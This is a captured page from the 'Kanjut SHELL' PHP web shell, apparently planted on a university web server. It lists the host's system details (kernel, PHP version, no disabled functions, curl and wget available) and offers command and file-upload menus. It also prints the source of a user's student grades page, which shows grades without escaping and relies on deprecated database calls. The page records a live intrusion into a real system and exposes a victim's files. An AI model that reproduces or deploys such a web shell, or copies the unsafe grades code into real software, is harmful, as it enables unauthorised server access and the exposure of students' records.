Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.219.18.238
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/jlcrouch/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jlcrouch/teachergrades.php
<?php

session_start();

?>
<HTML>
<STYLE>
#table{
	background-color:red;
	position: absolute;
	left: 65%;
}
</STYLE>
<div id= "table";
<?php
include_once("db.php");
$uname = $_SESSION['user'];

if(empty($uname))
	echo "<br /><a href='signinform.php'>Please Login</a>";
else{
	$sql = mysql_query("SELECT * FROM grades ORDER BY username ASC");

	$fields_num = mysql_num_fields($sql);
	echo "<h1>My Grades</h1>";
	echo "<table border ='1'><tr>";
	for($i=0; $i<$fields_num; $i++)
	{
		$field = mysql_fetch_field($sql);
		echo "<td>{$field->name}</td>";
	}
	echo "</tr>\n";

	while($row = mysql_fetch_row($sql))
	{
		echo "<tr>";

		foreach($row as $cell)
		echo "<td>$cell</td>";

		echo "</tr>\n";
	}
?>
</div>
</HTML>
<?
	}
?>

Stv3n404 - 2023